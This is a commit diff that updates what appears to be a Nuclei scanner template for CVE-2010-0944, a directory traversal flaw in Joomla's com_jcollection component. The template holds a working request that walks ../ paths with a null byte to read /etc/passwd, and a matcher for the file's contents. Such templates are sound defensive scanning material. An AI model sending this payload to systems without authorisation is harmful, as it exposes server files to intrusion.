Enhancement: cves/2010/CVE-2010-0944.yaml by mp

patch-1
MostInterestingBotInTheWorld 2022-02-13 14:07:21 -05:00
parent 92dfa1db78
commit dfb8cb5a84
1 changed files with 5 additions and 6 deletions

View File

@ -1,27 +1,26 @@
id: CVE-2010-0944 id: CVE-2010-0944
info: info:
name: Joomla! Component com_jcollection - Directory Traversal name: Joomla! Component com_jcollection - Directory Traversal
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Apply all relevant security patches and product upgrades.
reference: reference:
- https://www.exploit-db.com/exploits/11088 - https://www.exploit-db.com/exploits/11088
- https://www.cvedetails.com/cve/CVE-2010-0944 - https://www.cvedetails.com/cve/CVE-2010-0944
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-0944
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/13